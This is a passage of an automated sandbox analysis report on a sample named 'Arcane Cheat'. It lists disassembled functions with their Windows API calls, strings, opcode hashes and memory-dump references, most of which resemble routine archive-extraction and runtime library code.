                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                  • String ID: Thread pool initialization failed.
                                  • API String ID: 3340455307-2182114853
                                  • Opcode ID: b7a74fcc48d32e462ff81bba4a32c829e6ff85d04a82bbbfcbc18bf27da54343
                                  • Instruction ID: e0f66949d2fc3e0dfb5e098f508529e7e103a54a083293986f5c9a1306f096f0
                                  • Opcode Fuzzy Hash: b7a74fcc48d32e462ff81bba4a32c829e6ff85d04a82bbbfcbc18bf27da54343
                                  • Instruction Fuzzy Hash: FD1170B1505708AFC3215F69DC85AA7FBECFBA5755F10482EF1DAC6240E6B16980CF90
                                  Function 0083D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                  • API String ID: 0-56093855
                                  • Opcode ID: b06c05ee05a61d9b10170a7aa455926972abb3b4a8114cfca1c48c23c9b1c85b
                                  • Instruction ID: 731ea4657d555d29808dc6e397bba8bb89200e037719b8973361acd0d9ac4de0
                                  • Opcode Fuzzy Hash: b06c05ee05a61d9b10170a7aa455926972abb3b4a8114cfca1c48c23c9b1c85b
                                  • Instruction Fuzzy Hash: 7D017C71A00359AFCB129F58FD44E563BA9F788384F016421F909D2370DAB19C94EBE6
                                  Function 008491DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: __alldvrm$_strrchr
                                  • String ID:
                                  • API String ID: 1036877536-0
                                  • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                  • Instruction ID: 7b023f3a7444493c1c0892bb31f1f30798fd6cb899b5c4f129cac5483df97761
                                  • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                  • Instruction Fuzzy Hash: 35A13372A0038E9FEB31CE68C8917AFBBA5FF56310F1841A9E4D5DB381C2389942C755
                                  Function 0082A2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,008280B7,?,?,?), ref: 0082A351
                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,008280B7,?,?), ref: 0082A395
                                  • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,008280B7,?,?,?,?,?,?,?,?), ref: 0082A416
                                  • CloseHandle.KERNEL32(?,?,00000000,?,008280B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0082A41D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: File$Create$CloseHandleTime
                                  • String ID:
                                  • API String ID: 2287278272-0
                                  • Opcode ID: 0cea7319b946ed5d14cf1f2d2d087be5f2334f3cbfb60cee8a4daac0926eae30
                                  • Instruction ID: 493dbfa70e3265260e27502bcb4f7d8032e7367003213a0971894220a124b6a2
                                  • Opcode Fuzzy Hash: 0cea7319b946ed5d14cf1f2d2d087be5f2334f3cbfb60cee8a4daac0926eae30
                                  • Instruction Fuzzy Hash: 0841CE30248395ABD725DF24EC59BEABBE4FF81740F14091CB5D0D32C1D6A8DA889B53
                                  Function 0084C099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,008489AD,?,00000000,?,00000001,?,?,00000001,008489AD,?), ref: 0084C0E6
                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0084C16F
                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,008467E2,?), ref: 0084C181
                                  • __freea.LIBCMT ref: 0084C18A
                                    • Part of subcall function 00848518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0084C13D,00000000,?,008467E2,?,00000008,?,008489AD,?,?,?), ref: 0084854A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                  • String ID:
                                  • API String ID: 2652629310-0
                                  • Opcode ID: d83cd365094c2de5aee003f1745645f502545261de8adf25abbb6960f8203ada
                                  • Instruction ID: c9a3278578925beae4b2d90eba0305db55805fd6735ca73b4629d9c59ba92931
                                  • Opcode Fuzzy Hash: d83cd365094c2de5aee003f1745645f502545261de8adf25abbb6960f8203ada
                                  • Instruction Fuzzy Hash: 2631DC72A0121AABDF258F79CC45EAE7BA9FB40350F040129FC04DB291EB35CD50CBA0
                                  Function 00842503 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0084251A
                                    • Part of subcall function 00842B52: ___AdjustPointer.LIBCMT ref: 00842B9C
                                  • _UnwindNestedFrames.LIBCMT ref: 00842531
                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00842543
                                  • CallCatchBlock.LIBVCRUNTIME ref: 00842567
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                  • String ID:
                                  • API String ID: 2633735394-0
                                  • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                  • Instruction ID: 86b5c32ce6eb709943a2f04416d110bea3e3537e6cd122cbecbb18d11ba11b09
                                  • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                  • Instruction Fuzzy Hash: 0201173240010DBBCF129F59DC01EDA7BBAFF98714F458414F918A6121C776E9A1EBA1
                                  Function 00839DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetDC.USER32(00000000), ref: 00839DBE
                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00839DCD
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00839DDB
                                  • ReleaseDC.USER32(00000000,00000000), ref: 00839DE9
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: CapsDevice$Release
                                  • String ID:
                                  • API String ID: 1035833867-0
                                  • Opcode ID: 0b8d1553b932a54939f58fef46d7119f93b883c76aaa5fb3c8852993cf9fea12
                                  • Instruction ID: a2c2f988cbd90804fdbd069a0c616d6f9d4a71cf7194b1f64e18e7010bd0d736
                                  • Opcode Fuzzy Hash: 0b8d1553b932a54939f58fef46d7119f93b883c76aaa5fb3c8852993cf9fea12
                                  • Instruction Fuzzy Hash: 20E0EC31985A21E7D3201BACAC1EB8B3B54BF09752F050115F605AA1D0DAB04405CB94
                                  Function 00842016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00842016
                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0084201B
                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00842020
                                    • Part of subcall function 0084310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0084311F
                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00842035
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                  • String ID:
                                  • API String ID: 1761009282-0
                                  • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                  • Instruction ID: f3797002c6062c8886943d4cf9a144c921ee8f91525d81fd9f74fd1135c70830
                                  • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                  • Instruction Fuzzy Hash: B2C04C2510CA4CD41C113EBE31021BD2780FC727D4BD220C3F880D7503DE060A1A9077
                                  Function 00839F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00839DF1: GetDC.USER32(00000000), ref: 00839DF5
                                    • Part of subcall function 00839DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00839E00
                                    • Part of subcall function 00839DF1: ReleaseDC.USER32(00000000,00000000), ref: 00839E0B
                                  • GetObjectW.GDI32(?,00000018,?), ref: 00839F8D
                                    • Part of subcall function 0083A1E5: GetDC.USER32(00000000), ref: 0083A1EE
                                    • Part of subcall function 0083A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0083A21D
                                    • Part of subcall function 0083A1E5: ReleaseDC.USER32(00000000,?), ref: 0083A2B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ObjectRelease$CapsDevice
                                  • String ID: (
                                  • API String ID: 1061551593-3887548279
                                  • Opcode ID: 662061a9d6bac375b26b0565e01404469cf42cd7ad80140d067da0752da94cf2
                                  • Instruction ID: 69a4a5dc02f3ec356c1e23657a5e6e8a761250d16b244003a97ca9232567684c
                                  • Opcode Fuzzy Hash: 662061a9d6bac375b26b0565e01404469cf42cd7ad80140d067da0752da94cf2
                                  • Instruction Fuzzy Hash: 14810271608714AFC714DF68C844A2ABBE9FFC8706F00491DF98AD7260DB75AE05DB92
                                  Function 00830E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: _swprintf
                                  • String ID: %ls$%s: %s
                                  • API String ID: 589789837-2259941744
                                  • Opcode ID: 3e810e46358068877078e8c6ca79e0d42b9a96352911a83813b708b317d7cca1
                                  • Instruction ID: b750fc6e9c4b39bed377390b268d2cb92380d1320d177483187d476dc720edf2
                                  • Opcode Fuzzy Hash: 3e810e46358068877078e8c6ca79e0d42b9a96352911a83813b708b317d7cca1
                                  • Instruction Fuzzy Hash: 8D51D73124CB48FEEE241AD4DC76F367A55F788F04F204906F7DAE44E1CA9154906E97
                                  Function 0082772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00827730
                                  • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008278CC
                                    • Part of subcall function 0082A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0082A27A,?,?,?,0082A113,?,00000001,00000000,?,?), ref: 0082A458
                                    • Part of subcall function 0082A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0082A27A,?,?,?,0082A113,?,00000001,00000000,?,?), ref: 0082A489
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: File$Attributes$H_prologTime
                                  • String ID: :
                                  • API String ID: 1861295151-336475711
                                  • Opcode ID: a52df5119ea41db17a3375cf5c9c0c06ec67fce31b3f6b397bde82c6c58c3211
                                  • Instruction ID: 4b3fe7c4b2ee87a8d3e3863084644a0c125a53ce123521b68a38e54eb866d846
                                  • Opcode Fuzzy Hash: a52df5119ea41db17a3375cf5c9c0c06ec67fce31b3f6b397bde82c6c58c3211
                                  • Instruction Fuzzy Hash: 42415171805238AADB25EB54ED55EEEB37CFF45300F0040AAB649E2192DB745BC8CF66
                                  Function 0082B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: UNC$\\?\
                                  • API String ID: 0-253988292
                                  • Opcode ID: 0db1ca33bae0ab61613717a8432e8aa43b806aec45602456b1f1f976117951b7
                                  • Instruction ID: 25e41ec28d12db175bb1bf0fd20f60022a6bc2496181ebeeebc46859e5b079cc
                                  • Opcode Fuzzy Hash: 0db1ca33bae0ab61613717a8432e8aa43b806aec45602456b1f1f976117951b7
                                  • Instruction Fuzzy Hash: 2341AD3540123DABCB21AF25EC41EAB77A9FF90390B104436F854E7292E7709AC4CAA1
                                  Function 00838FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Shell.Explorer$about:blank
                                  • API String ID: 0-874089819
                                  • Opcode ID: 884ab637da3fba2ee104d16388250db85fb5e9ca41653e7bd2f3c03061272455
                                  • Instruction ID: 16af76f991b86a03582c38626c35d6a8b5e720e477dff96d0abb0fe1b59414e6
                                  • Opcode Fuzzy Hash: 884ab637da3fba2ee104d16388250db85fb5e9ca41653e7bd2f3c03061272455
                                  • Instruction Fuzzy Hash: 4B218D712147149FDB089F68C8A5A2A77A9FFC4712F14856DF849CB292DFB4ED00CBA1
                                  Function 0082EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0082EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0082EB92
                                    • Part of subcall function 0082EB73: GetProcAddress.KERNEL32(008681C0,CryptUnprotectMemory), ref: 0082EBA2
                                  • GetCurrentProcessId.KERNEL32(?,?,?,0082EBEC), ref: 0082EC84
                                  Strings
                                  • CryptProtectMemory failed, xrefs: 0082EC3B
                                  • CryptUnprotectMemory failed, xrefs: 0082EC7C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AddressProc$CurrentProcess
                                  • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                  • API String ID: 2190909847-396321323
                                  • Opcode ID: 0a063d46dbc0d8c674888fa378e0cace290ee58453ccfb2dd1aa8a3898c4d844
                                  • Instruction ID: d1e3682f8b08d4048d15648f349682334eac1230ec1d1be61ff5a810f7a19ae7
                                  • Opcode Fuzzy Hash: 0a063d46dbc0d8c674888fa378e0cace290ee58453ccfb2dd1aa8a3898c4d844
                                  • Instruction Fuzzy Hash: 70118632A14638ABDB269F74FC02A6E3B04FF01761B014119FC05EB281CB78AE8187CD
                                  Function 00830889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNEL32(00000000,00010000,008309D0,?,00000000,00000000), ref: 008308AD
                                  • SetThreadPriority.KERNEL32(?,00000000), ref: 008308F4
                                    • Part of subcall function 00826E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00826EAF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Thread$CreatePriority__vswprintf_c_l
                                  • String ID: CreateThread failed
                                  • API String ID: 2655393344-3849766595
                                  • Opcode ID: bc85c2b34a5642451f06f45d4b470f4bf741bb34a4bea3adda1c0cdbc2de5c1c
                                  • Instruction ID: 07412391e2e47cbc448744cd2ecbbddc92d555d58a8a1bdf6c2c481d92bbd6aa
                                  • Opcode Fuzzy Hash: bc85c2b34a5642451f06f45d4b470f4bf741bb34a4bea3adda1c0cdbc2de5c1c
                                  • Instruction Fuzzy Hash: 8501D6B5244305AFD6216F54FC91B677798FB90716F21003DFA86D21C1CEE1A8419EE4
                                  Function 0082130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0082DA98: _swprintf.LIBCMT ref: 0082DABE
                                    • Part of subcall function 0082DA98: _strlen.LIBCMT ref: 0082DADF
                                    • Part of subcall function 0082DA98: SetDlgItemTextW.USER32(?,0085E154,?), ref: 0082DB3F
                                    • Part of subcall function 0082DA98: GetWindowRect.USER32(?,?), ref: 0082DB79
                                    • Part of subcall function 0082DA98: GetClientRect.USER32(?,?), ref: 0082DB85
                                  • GetDlgItem.USER32(00000000,00003021), ref: 0082134F
                                  • SetWindowTextW.USER32(00000000,008535B4), ref: 00821365
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                  • String ID: 0
                                  • API String ID: 2622349952-4108050209
                                  • Opcode ID: b100c35012e8f18de212299a940915c18b73ed51ee8fed23de008e29f675f37e
